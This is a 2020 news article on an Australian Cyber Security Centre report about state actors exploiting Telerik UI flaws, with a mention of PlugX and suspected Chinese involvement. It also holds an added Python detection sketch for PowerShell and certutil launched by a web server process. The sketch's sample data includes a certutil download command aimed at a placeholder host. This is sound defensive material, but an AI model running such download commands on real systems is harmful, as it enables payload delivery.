Hackers Use Cryptojacking Exploits To Hack Australian Network, ACSC

June 29, 2020      Jyoti Singh

A 48-page report published on June 24 by the Australian Cyber Security Centre (ACSC) stated that a group of ‘state actors’ entered the Australian network, exploiting vulnerabilities related to cryptojacking malware attacks.

According to the report, the actors exploited four vulnerabilities in Telerik UI, including CVE-2019-18935.

Blue Mockingbird Uses Telerik UI Vulnerability

Notably, the Blue Mockingbird malware gang recently used CVE-2019-18935 to infect systems with Monero mining software.

It is yet to be confirmed whether the hackers were able to install cryptojacking malware when they attacked the network. Cybercriminals mostly use this kind of malware because it lets them install crypto-mining applications within a corporate network.

The use of CVE-2019-18935 is somewhat similar to the Blue Mockingbird attacks, but that does not mean Blue Mockingbird was part of the recent cyberattack in Australia.

The ACSC identified the payloads that were mostly manipulated or damaged because the threat actors failed at the reverse shell. The payloads identified were: payloads that tried to execute a PowerShell reverse shell; payloads that tried to execute certutil.exe in order to download another payload; a payload that executed binary malware; and a payload that calculated the absolute path of the webroot.
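For defenders, two of the payload behaviours listed above (a PowerShell child process and certutil.exe used as a downloader) can be spotted in process-creation logs. The sketch below is an added example, not code from the ACSC report; it assumes the vulnerable application runs inside the IIS worker process w3wp.exe, and the event field names and sample events are constructed for illustration.

```python
import ntpath
import re

# Assumption: the Telerik UI application is hosted by the IIS worker process.
WEB_PARENTS = {"w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# certutil arguments that indicate remote content is being fetched.
CERTUTIL_FETCH = re.compile(r"(?i)(?:[-/]urlcache|[-/]verifyctl|https?://)")

def basename(path):
    """Lower-cased file name of a Windows path, tolerant of quotes."""
    return ntpath.basename(path.strip('"')).lower()

def findings(event):
    """Return the reasons a process-creation event is suspicious, if any."""
    if basename(event["parent_image"]) not in WEB_PARENTS:
        return []
    child = basename(event["image"])
    reasons = []
    if child in SHELLS:
        reasons.append("web worker spawned PowerShell")
    if child == "certutil.exe" and CERTUTIL_FETCH.search(event["command_line"]):
        reasons.append("web worker spawned certutil with download arguments")
    return reasons

# Constructed sample events (hypothetical field names, not from the report).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command <constructed>"},
    {"parent_image": r"c:\windows\system32\inetsrv\W3WP.EXE",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://example.invalid/a.bin a.bin"},
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -hashfile C:\\inetpub\\site.zip SHA256"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},
]

def scan(events):
    """Return (index, reasons) for every event that produced a finding."""
    return [(i, r) for i, e in enumerate(events) if (r := findings(e))]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(index, "; ".join(reasons))
```

The third and fourth sample events are deliberate negatives: certutil hashing a local file under the web worker, and PowerShell started by an interactive user, neither of which is flagged.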

PlugX Malware Also Used To Exploit Australian Network 

The report further mentioned that one of the malware families the Australian government found was PlugX, which is used by a group of Chinese hackers who are supposedly connected with the Government of China.

According to Australian officials, there is a strong chance that China is behind this cyberattack, because the diplomatic dispute between the two countries has been escalating for a long time.

The officials have suggested that this attack could have taken place because the Australian Government earlier called for an investigation into COVID-19’s origin, and the dragon nation’s officials were not happy with it.

The Chinese officials stated that this investigation was a discriminatory accusation and reacted with trade retaliation.


Jyoti Singh

Jyoti is a graduate from GGSIPU and has done her PG Diploma in English Journalism from IIMC. Presently, she is working as a content writer with Agio Support Solution Pvt. Ltd. Her aim is to provide informative content about cryptocurrency and blockchain, to the tech-enthusiasts.